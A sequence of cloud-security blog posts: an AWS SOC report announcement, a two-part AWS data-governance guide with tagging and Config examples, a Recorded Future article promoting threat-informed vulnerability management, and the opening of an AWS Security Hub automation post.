Amazon Web Services (AWS) is pleased to announce that the Fall 2025 System and Organization Controls (SOC) 1, 2, and 3 reports are now available. The reports cover 185 services over the 12-month period from October 1, 2024–September 30, 2025, giving customers a full year of assurance. These reports demonstrate our continuous commitment to adhering to the heightened expectations of cloud service providers.
AWS strives to continuously bring services into the scope of its compliance programs to help customers meet their architectural and regulatory needs. You can view the current list of services in scope on our Services in Scope page. As an AWS customer, you can reach out to your AWS account team if you have any questions or feedback about SOC compliance.
To learn more about AWS compliance and security programs, see AWS Compliance Programs. As always, we value feedback and questions; reach out to the AWS Compliance team through the Contact Us page.
If you have feedback about this post, submit comments in the Comments section below.
In Part 1, we explored the foundational strategy, including data classification frameworks and tagging approaches. In this post, we examine the technical implementation approach and key architectural patterns for building a governance framework.
We explore governance controls across four implementation areas, building from foundational monitoring to advanced automation. Each area builds on the previous one, so you can implement incrementally and validate as you go:
Monitoring foundation: Begin by establishing your monitoring baseline. Set up AWS Config rules to track tag compliance across your resources, then configure Amazon CloudWatch dashboards to provide real-time visibility into your governance posture. By using this foundation, you can understand your current state before implementing enforcement controls.
Preventive controls: Build proactive enforcement by deploying AWS Lambda functions that validate tags at resource creation time. Implement Amazon EventBridge rules to trigger real-time enforcement actions and configure service control policies (SCPs) to establish organization-wide guardrails that prevent non-compliant resource deployment.
Automated remediation: Reduce manual intervention by setting up AWS Systems Manager Automation Documents that respond to compliance violations. Configure automated responses that correct common issues like missing tags or improper encryption and implement classification-based security controls that automatically apply appropriate protections based on data sensitivity.
Advanced features: Extend your governance framework with sophisticated capabilities. Deploy data sovereignty controls to help ensure regulatory compliance across AWS Regions, implement intelligent lifecycle management to optimize costs while maintaining compliance, and establish comprehensive monitoring and reporting systems that provide stakeholders with clear visibility into your governance effectiveness.
Prerequisites
Before beginning implementation, ensure you have AWS Command Line Interface (AWS CLI) installed and configured with appropriate credentials for your target accounts. Set AWS Identity and Access Managment (IAM) permissions so that you can create roles, Lambda functions, and AWS Config rules. Finally, basic familiarity with AWS CloudFormation or Terraform will be helpful, because we’ll use CloudFormation throughout our examples.
Tag governance controls
Implementing tag governance requires multiple layers of controls working together across AWS services. These controls range from preventive measures that validate resources at creation to detective controls that monitor existing resources. This section describes each control type, starting with preventive controls that act as first line of defense.
Preventive controls
Preventive controls help ensure resources are properly tagged at creation time. By implementing Lambda functions triggered by AWS CloudTrail events, you can validate tags before resources are created, preventing non-compliant resources from being deployed:
# AWS Lambda function for preventive tag enforcement def enforce_resource_tags(event, context):
required_tags = ['DataClassification', 'DataOwner', 'Environment']
# Extract resource details from the event
resource_tags =
event['detail']['requestParameters'].get('Tags', {})
# Validate required tags are present
missing_tags = [tag for tag in required_tags if tag not in resource_tags]
if missing_tags:
# Send alert to security team
# Log non-compliance for compliance reporting
raise Exception(f"Missing required tags: {missing_tags}")
return {‘status’: ‘compliant’}
AWS Organizations tag policies provide a foundation for consistent tagging across your organization. These policies define standard tag formats and values, helping to ensure consistency across accounts:
Tag-based access control gives you detailed permissions using attribute-based access control (ABAC). By using this approach, you can define permissions based on resource attributes rather than creating individual IAM policies for each use case:
While implementing tag governance within a single account is straightforward, most organizations operate in a multi-account environment. Implementing consistent governance across your organization requires additional controls:
Integration with on-premises governance frameworks
Many organizations maintain existing governance frameworks for their on-premises infrastructure. Extending these frameworks to AWS requires careful integration and applicability analysis. The following example shows how to use AWS Service Catalog to create a portfolio of AWS resources that align with your on-premises governance standards.
# AWS Service Catalog portfolio for on-premises aligned resources
ServiceCatalogIntegration:
Portfolio:
Type: AWS::ServiceCatalog::Portfolio
Properties:
DisplayName: Enterprise-Aligned Resources
Description: Resources that comply with existing governance framework
ProviderName: Enterprise IT
# Product that maintains on-prem naming conventions and controls
CompliantProduct:
Type: AWS::ServiceCatalog::CloudFormationProduct
Properties:
Name: Compliant-Resource-Bundle
Owner: Enterprise Architecture
Tags:
- Key: OnPremMapping
Value: "EntArchFramework-v2"
Automating security controls based on classification
After data is classified, use these classifications to automate security controls and use AWS Config to track and validate that resources are properly tagged through defined rules that assess your AWS resource configurations, including a built-in required-tags rule. For non-compliant resources, you can use Systems Manager to automate the remediation process.
With proper tagging in place, you can implement automated security controls using EventBridge and Lambda. By using this combination, you can create a cost-effective and scalable infrastructure for enforcing security policies based on data classification. For example, when a resource is tagged as high impact, you can use EventBridge to trigger a Lambda function to enable required security measures.
This example automation applies security controls consistently, reducing human error and maintaining compliance. Code-based controls ensure policies match your data classification.
Data sovereignty and residency requirements help you comply with regulations like GDPR. Such controls can be implemented to restrict data storage and processing to specific AWS Regions:
# Config rule for region restrictions
AWSConfig:
ConfigRule:
Type: AWS::Config::ConfigRule
Properties:
ConfigRuleName: s3-bucket-region-check
Description: Checks if S3 buckets are in allowed regions
Source:
Owner: AWS
SourceIdentifier: S3_BUCKET_REGION
InputParameters:
allowedRegions:
- eu-west-1
- eu-central-1
Note: This example uses eu-west-1 and eu-central-1 because these Regions are commonly used for GDPR compliance, providing data residency within the European Union. Adjust these Regions based on your specific regulatory requirements and business needs. For more information, see Meeting data residency requirements on AWS and Controls that enhance data residence protection.
Disaster recovery integration with governance controls
While organizations often focus on system availability and data recovery, maintaining governance controls during disaster recovery (DR) scenarios is important for compliance and security. To implement effective governance in your DR strategy, start by using AWS Config rules to check that DR resources maintain the same governance standards as your primary environment:
For your most critical data (classified as Level 1 in part 1 of this post), implement cross-Region replication while maintaining strict governance controls. This helps ensure that sensitive data remains protected even during failover scenarios:
By combining AWS Config for resource compliance, CloudWatch for metrics and alerting, and Amazon Macie for sensitive data discovery, you can create a robust compliance monitoring framework that automatically detects and responds to compliance issues:
Figure 1: Compliance monitoring architecture
This architecture (shown in Figure 1) demonstrates how AWS services work together to provide compliance monitoring:
AWS Config, CloudTrail, and Macie monitor AWS resources
CloudWatch aggregates monitoring data
Alerts and dashboards provide real-time visibility
The following CloudFormation template implements these controls:
These controls provide real-time visibility into your security posture, automate responses to potential security events, and use Macie for sensitive data discovery and classification. For a complete monitoring setup, review List of AWS Config Managed Rules and Using Amazon CloudWatch dashboards.
Using AWS data lakes for governance
Modern data governance strategies often use data lakes to provide centralized control and visibility. AWS provides a comprehensive solution through the Modern Data Architecture Accelerator (MDAA), which you can use to help you rapidly deploy and manage data platform architectures with built-in security and governance controls. Figure 2 shows an MDAA reference architecture.
Understanding and managing access patterns is important for effective governance. Use CloudTrail and Amazon Athena to analyze access patterns:
SELECT
useridentity.arn,
eventname,
requestparameters.bucketname,
requestparameters.key,
COUNT(*) as access_count
FROM cloudtrail_logs
WHERE eventname IN ('GetObject', 'PutObject')
GROUP BY 1, 2, 3, 4
ORDER BY access_count DESC
LIMIT 100;
This query helps identify frequently accessed data and unusual patterns in access behavior. These insights help you to:
Optimize storage tiers based on access frequency
Refine DR strategies for frequently accessed data
Identify of potential security risks through unusual access patterns
Fine-tune data lifecycle policies based on usage patterns
For sensitive data discovery, consider integrating Macie to automatically identify and protect PII across your data estate.
Machine learning model governance with SageMaker
As organizations advance in their data governance journey, many are deploying machine learning models in production, necessitating governance frameworks that extend to machine learning (ML) operations. Amazon SageMaker offers advanced tools that you can use to maintain governance over ML assets without impeding innovation.
SageMaker governance tools work together to provide comprehensive ML oversight:
Role Manager provides fine-grained access control for ML roles
Model Cards centralize documentation and lineage information
Model Dashboard offers organization-wide visibility into deployed models
Model Monitor automates drift detection and quality control
The following example configures SageMaker governance controls:
# Basic/High-level ML governance setup with role and monitoring SageMakerRole:
Type: AWS::IAM::Role
Properties:
# Allow SageMaker to use this role
AssumeRolePolicyDocument:
Statement:
- Effect: Allow
Principal:
Service: sagemaker.amazonaws.com
Action: sts:AssumeRole
# Attach necessary permissions
ManagedPolicyArns:
- arn:aws:iam::aws:policy/AmazonSageMakerFullAccess
ModelMonitor:
Type: AWS::SageMaker::MonitoringSchedule
Properties:
# Set up hourly model monitoring
MonitoringScheduleName: hourly-model-monitor
ScheduleConfig:
ScheduleExpression: 'cron(0 * * * ? *)' # Run hourly
This example demonstrates two essential governance controls: role-based access management for secure service interactions and automated hourly monitoring for ongoing model oversight. While these technical implementations are important, remember that successful ML governance requires integration with your broader data governance framework, helping to ensure consistent controls and visibility across your entire data and analytics ecosystem. For more information, see Model governance to manage permissions and track model performance.
Cost optimization through automated lifecycle management
Effective data governance isn’t just about security—it’s also about managing cost efficiently. Implement intelligent data lifecycle management based on classification and usage patterns, as shown in Figure 3:
Figure 3: Tag-based lifecycle management in Amazon S3
Figure 3 illustrates how tags drive automated lifecycle management:
S3 Lifecycle automatically optimizes storage costs while maintaining compliance with retention requirements. For example, data initially stored in Amazon S3 Intelligent-Tiering automatically moves to Glacier after 90 days, significantly reducing storage costs while helping to ensure data remains available when needed. For more information, seeManaging the lifecycle of objects and Managing storage costs with Amazon S3 Intelligent-Tiering.
Conclusion
Successfully implementing data governance on AWS requires both a structured approach and adherence to key best practices. As you progress through your implementation journey, keep these fundamental principles in mind:
Start with a focused scope and gradually expand. Begin with a pilot project that addresses high-impact, low-complexity use cases. By using this approach, you can demonstrate quick wins while building experience and confidence in your governance framework.
Make automation your foundation. Apply AWS services such as Amazon EventBridge for event-driven responses, implement automated remediation for common issues, and create self-service capabilities that balance efficiency with compliance. This automation-first approach helps ensure scalability and consistency in your governance framework.
Maintain continuous visibility and improvement. Regular monitoring, compliance checks, and framework updates are essential for long-term success. Use feedback from your operations team to refine policies and adjust controls as your organization’s needs evolve.
Common challenges to be aware of:
Initial resistance to change from teams used to manual processes
Complexity in handling legacy systems and data
Balancing security controls with operational efficiency
Maintaining consistent governance across multiple AWS accounts and regions
For more information, implementation support, and guidance, see:
By following this approach and remaining mindful of potential challenges, you can build a robust, scalable data governance framework that grows with your organization while maintaining security, compliance, and efficient data operations.
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
Generative AI and machine learning workloads create massive amounts of data. Organizations need data governance to manage this growth and stay compliant. While data governance isn’t a new concept, recent studies highlight a concerning gap: a Gartner study of 300 IT executives revealed that only 60% of organizations have implemented a data governance strategy, with 40% still in planning stages or uncertain where to begin. Furthermore, a 2024 MIT CDOIQ survey of 250 chief data officers (CDOs) found that only 45% identify data governance as a top priority.
Although most businesses recognize the importance of data governance strategies, regular evaluation is important to ensure these strategies evolve with changing business needs, industry requirements, and emerging technologies. In this post, we show you a practical, automation-first approach to implementing data governance on Amazon Web Services (AWS) through a strategic and architectural guide—whether you’re starting at the beginning or improving an existing framework.
In this two-part series, we explore how to build a data governance framework on AWS that’s both practical and scalable. Our approach aligns with what AWS has identified as the core benefits of data governance:
Classify data consistently and automate controls to improve quality
Give teams secure access to the data they need
Monitor compliance automatically and catch issues early
In this post, we cover strategy, classification framework, and tagging governance—the foundation you need to get started. If you don’t already have a governance strategy, we provide a high-level overview of AWS tools and services to help you get started. If you have a data governance strategy, the information in this post can assist you in evaluating its effectiveness and understanding how data governance is evolving with new technologies.
In Part 2, we explore the technical architecture and implementation patterns with conceptual code examples, and throughout both parts, you’ll find links to production-ready AWS resources for detailed implementation.
Prerequisites
Before implementing data governance on AWS, you need the right AWS setup and buy-in from your teams.
Beyond these services, you’ll use several AWS tools for automation and enforcement. The AWS service quick reference table that follows lists everything used throughout this guide.
Organizational readiness
Successful implementation of data governance requires clear organizational alignment and preparation across multiple dimensions.
Define roles and responsibilities. Data owners classify data and approve access requests. Your platform team handles AWS infrastructure and builds automation, while security teams set controls and monitor compliance. Application teams then implement these standards in their daily workflows.
Document your compliance requirements. List the regulations you must follow—GDPR, PCI-DSS, SOX, HIPAA, or others. Create a data classification framework that aligns with your business risk. Document your tagging standards and naming conventions so everyone follows the same approach.
Plan for change management. Get executive support from leaders who understand why governance matters. Start with pilot projects to demonstrate value before rolling out organization-wide. Provide role-based training and maintain up-to-date governance playbooks. Establish feedback mechanisms so teams can report issues and suggest improvements.
Key performance indicators (KPIs) to monitor
To measure the effectiveness of your data governance implementation, track the following essential metrics and their target objectives.
Resource tagging compliance: Aim for 95%, measured through AWS Config rules with weekly monitoring, focusing on critical resources and sensitive data classifications.
Mean time to respond to compliance issues: Target less than 24 hours for critical issues. Tracked using CloudWatch metrics with automated alerting for high-priority non-compliance events
Reduction in manual governance tasks: Target reduction of 40% in the first year. Measured through automated workflow adoption and remediation success rates.
Storage cost optimization based on data classification: Target 15–20% reduction through intelligent tiering and lifecycle policies, monitored monthly by classification level.
With these technical and organizational foundations in place, you’re ready to implement a sustainable data governance framework.
AWS services used in this guide – Quick reference
This implementation uses the following AWS services. Some are prerequisites, while others are introduced throughout the guide.
Continuously monitors resource configurations and evaluates them against rules you define (such as requiring that all S3 buckets much be encrypted). When it finds resources that don’t meet your rules, it flags them as non-compliant so you can fix them manually or automatically.
Acts as a central notification system that watches for specific events in your AWS environment (such as when an S3 bucket has been created) and automatically triggers actions in response (such as by running a Lambda function to check if it has the required tags). Think of it as an if this happens, then do that automation engine.
Automates operational tasks across your AWS resources. In governance, it’s primarily used to automatically fix non-compliant resources—for example, if AWS Config detects an unencrypted database, Systems Manager can run a pre-defined script to enable encryption without manual intervention.
Uses machine learning to automatically discover, classify, and protect sensitive data like personal identifiable information (PII) across your S3 buckets.
Provides specialized tools for governing machine learning operations including model monitoring, documentation, and access control.
Understanding the data governance challenge
Organizations face complex data management challenges, from maintaining consistent data classification to ensuring regulatory compliance across their environments. Your strategy should maintain security, ensure compliance, and enable business agility through automation. While this journey can be complex, breaking it down into manageable components makes it achievable.
The foundation: Data classification framework
Data classification is a foundational step in cybersecurity risk management and data governance strategies. Organizations should use data classification to determine appropriate safeguards for sensitive or critical data based on their protection requirements. Following the NIST (National Institute of Standards and Technology) framework, data can be categorized based on the potential impact to confidentiality, integrity, and availability of information systems:
High impact: Severe or catastrophic adverse effect on organizational operations, assets, or individuals
Moderate impact: Serious adverse effect on organizational operations, assets, or individuals
Low impact: Limited adverse effect on organizational operations, assets, or individuals
Before implementing controls, establishing a clear data classification framework is essential. This framework serves as the backbone of your security controls, access policies, and automation strategies. The following is an example of how a company subject to the Payment Card Industry Data Security Standard (PCI-DSS) might classify data:
Security controls: Encryption at rest and in transit, strict access controls, comprehensive audit logging
Level 2 – Internal use data:
Examples: Internal documentation, proprietary business information, development code
Security controls: Standard encryption, role-based access control
Level 3 – Public data:
Examples: Marketing materials, public documentation, press releases
Security controls: Integrity checks, version, control
To help with data classification and tagging, AWS created AWS Resource Groups, a service that you can use to organize AWS resources into groups using criteria that you define as tags. If you’re using multiple AWS accounts across your organization, AWS Organizations supports tag policies, which you can use to standardize the tags attached to the AWS resources in an organization’s account. The workflow for using tagging is shown in Figure 1. For more information, see Guidance for Tagging on AWS.
Figure 1: Workflow for tagging on AWS for a multi-account environment
Your tag governance strategy
A well-designed tagging strategy is fundamental to automated governance. Tags not only help organize resources but also enable automated security controls, cost allocation, and compliance monitoring.
Figure 2: Tag governance workflow
As shown in Figure 2, tag policies use the following process:
AWS validates tags when you create resources.
Non-compliant resources trigger automatic remediation, while compliant resources deploy normally.
Continuous monitoring catches variation from your policies.
The following tagging strategy enables automation:
While AWS Organizations tag policies provide a foundation for consistent tagging, comprehensive tag governance requires additional enforcement mechanisms, which we explore in detail in Part 2.
Conclusion
This first part of the two-part series established the foundational elements of implementing data governance on AWS, covering data classification frameworks, effective tagging strategies, and organizational alignment requirements. These fundamentals serve as building blocks for scalable and automated governance approaches. Part 2 focuses on technical implementation and architectural patterns, including monitoring foundations, preventive controls, and automated remediation. The discussion extends to tag-based security controls, compliance monitoring automation, and governance integration with disaster recovery strategies. Additional topics include data sovereignty controls and machine learning model governance with Amazon SageMaker, supported by AWS implementation examples.
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
Traditional vulnerability management tools can no longer keep up with the speed of modern exploitation—threat context is now mandatory.
Threat and Vulnerability Management (TVM) systems unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.
Static CVSS scores fail to reflect exploitation likelihood; intelligence-driven, dynamic risk scoring is essential in 2026.
Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste, enhancing detection and remediation while reducing alert fatigue.
Why Threat and Vulnerability Management Must Evolve in 2026
Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.
Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.
Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.
In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using intelligence-driven TVM systems.
The Core Problem: Alert Fatigue and Prioritization Failure
As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.
Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these challenges of prioritization. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.
However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:
Is exploit code available?
Is the vulnerability actively exploited?
Are threat actors discussing or operationalizing it?
As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.
At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.
Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:
Operational drag and burnout
Delayed remediation of truly dangerous vulnerabilities
Increased business risk despite increased effort
Fractured security operations
Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.
The Evolving Threat Landscape Demands a New Approach
Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.
Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.
At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an integrated approach between the two.
In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.
What Is Threat and Vulnerability Management (TVM)?
Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:
Active exploitation
Threat actor behavior
Asset criticality
TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.
This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.
The Five Core Pillars of Modern TVM Systems
As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.
1. Continuous Asset Discovery & Inventory
Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.
Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.
2. Vulnerability Assessment & Scoring
TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.
3. External Threat Context Enrichment
This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.
Vulnerabilities are mapped to known threat actors, active exploitation, and MITRE ATT&CK® techniques, ultimately transforming raw findings into actionable intelligence.
4. Risk-Based Prioritization (RBVM)
Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.
5. Automated Remediation & Verification
Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.
These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.
Stop Patching Everything — Use Intelligence to Prioritize Real Risk
The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.
Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.
Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.
The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.
See Your Risk Like an Attacker: The Full Attack Surface View
In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.
The Visibility Gap: Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.
Attack Surface Intelligence Explained: Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.
Connecting the Dots with Vulnerability Tools: When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.
Three Strategic Recommendations for Security Leaders
Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.
1. Bridge the Gap Between Security and IT
Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.
2. Embrace Automation and Workflow Integration
Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.
3. Measure What Matters — Time-to-Remediate (TTR)
Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.
The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy
Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.
Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.
Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.
By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.
Frequently Asked Questions
What is the primary difference between a Vulnerability and a Threat?
A Vulnerability is a weakness or flaw in an asset (e.g., unpatched software, misconfiguration) that could be exploited. A Threat is a person, group, or event (e.g., a threat actor, a piece of malware) that has the potential to exploit that vulnerability to cause harm.
What is the biggest challenge facing traditional vulnerability management programs today?
The biggest challenge is alert fatigue and prioritization noise. Traditional programs generate an overwhelming number of vulnerabilities, often relying only on the technical severity score (like CVSS). This leads security teams to waste time patching low-risk flaws while critical, actively exploited vulnerabilities remain unaddressed.
Why is integrating external threat intelligence mandatory for TVM in 2026?
External threat intelligence provides real-time context on the threat landscape. These days, it’s mandatory because it allows security teams to identify which vulnerabilities are being actively exploited in the wild, have associated proof-of-concept (PoC) code, or are being discussed on the dark web, enabling true risk-based prioritization.
How does Recorded Future Vulnerability Intelligence help with prioritization?
Recorded Future Vulnerability Intelligence automatically assigns a dynamic Risk Score to every CVE by correlating it with real-time threat intelligence from across the internet, including evidence of active exploitation, malware associations, and dark web chatter. This lets teams instantly know if a vulnerability is a theoretical risk or an immediate, active threat requiring urgent attention.
What is Attack Surface Intelligence, and what role does it play in TVM?
Attack Surface Intelligence is the continuous process of identifying and monitoring all external-facing assets of an organization (like public IPs, domains, and cloud services). In TVM, it is crucial to ensure that vulnerabilities are not just identified on known assets, but also on shadow IT and unknown exposed systems that are most likely to be targeted by adversaries.
How does the TVM lifecycle differ from the traditional vulnerability management lifecycle?
While both involve Discovery, Assessment, and Remediation, the TVM lifecycle adds an explicit Threat Analysis step before prioritization. The modern TVM cycle is typically:
A new version of AWS Security Hub, is now generally available, introducing new ways for organizations to manage and respond to security findings. The enhanced Security Hub helps you improve your organization’s security posture and simplify cloud security operations by centralizing security management across your Amazon Web Services (AWS) environment. The new Security Hub transforms how organizations handle security findings through advanced automation capabilities with real-time risk analytics, automated correlation, and enriched context that you can use to prioritize critical issues and reduce response times. Automation also helps ensure consistent response procedures and helps you meet compliance requirements.
AWS Security Hub CSPM (cloud security posture management) is now an integral part of the detection engines for Security Hub. Security Hub provides centralized visibility across multiple AWS security services to give you a unified view of your cloud environment, including risk-based prioritization views, attack path visualization, and trend analytics that help you understand security patterns over time.
This is the third post in our series on the new Security Hub capabilities. In our first post, we discussed how Security Hub unifies findings across AWS services to streamline risk management. In the second post, we shared the steps to conduct a successful Security Hub proof of concept (PoC).
We walk through the setup and configuration of automation rules, share best practices for creating effective response workflows, and provide real-world examples of how these tools can be used to automate remediation, escalate high-severity findings, and support compliance requirements.
Security Hub automation enables automatic response to security findings to help ensure critical findings reach the right teams quickly, so that they can reduce manual effort and response time for common security incidents while maintaining consistent remediation processes.
Note: Automation rules evaluate new and updated findings that Security Hub generates or ingests after you create them, not historical findings. These automation capabilities help ensure critical findings reach the right teams quickly.
Why automation matters in cloud security
Organizations often operate across hundreds of AWS accounts, multiple AWS Regions, and diverse services—each producing findings that must be triaged, investigated, and acted upon. Without automation, security teams face high volumes of alerts, duplication of effort, and the risk of delayed responses to critical issues.
Manual processes can’t keep pace with cloud operations; automation helps solve this by changing your security operations in three ways. Automation filters and prioritizes findings based on your criteria, showing your team only relevant alerts. When issues are detected, automated responses trigger immediately—no manual intervention needed.
If you’re managing multiple AWS accounts, automation applies consistent policies and workflows across your environment through centralized management, shifting your security team from chasing alerts to proactively managing risk before issues escalate.
Designing routing strategies for security findings
With Security Hub configured, you’re ready to design a routing strategy for your findings and notifications. When designing your routing strategy, ask whether your existing Security Hub configuration meets your security requirements. Consider whether Security Hub automations can help you meet security framework requirements like NIST 800-53 and identify KPIs and metrics to measure whether your routing strategy works.
Security Hub automation rules and automated responses can help you meet the preceding requirements, however it’s important to understand how your compliance teams, incident responders, security operations personnel, and other security stakeholders operate on a day-to-day basis. For example, do teams use the AWS Management Console for AWS Security Hub regularly? Or do you need to send most findings downstream to an IT systems management (ITSM) tool (such as Jira or ServiceNow) or third-party security orchestration, automation, and response (SOAR) platforms for incident tracking, workflow management, and remediation?
Next, create and maintain an inventory of critical applications. This helps you adjust finding severity based on business context and your incident response playbooks.
Consider the scenario where Security Hub identifies a medium-severity vulnerability on an Elastic Compute Cloud instance. In isolation, this might not trigger immediate action. When you add business context—such as strategic objectives or business criticality—you might discover that this instance hosts a critical payment processing application, revealing the true risk. By implementing Security Hub automation rules with enriched context, this finding can be upgraded to critical severity and automatically routed to ServiceNow for immediate tracking. In addition, by using Security Hub automation with Amazon EventBridge, you can trigger an AWS Systems Manager Automation document to isolate the EC2 instance for security forensics work to then be carried out.
Because Security Hub offers OCSF format and schema, you can use the extensive schema elements that OCSF offers you to target findings for automation and help your organization meet security strategy requirements.
Example use cases
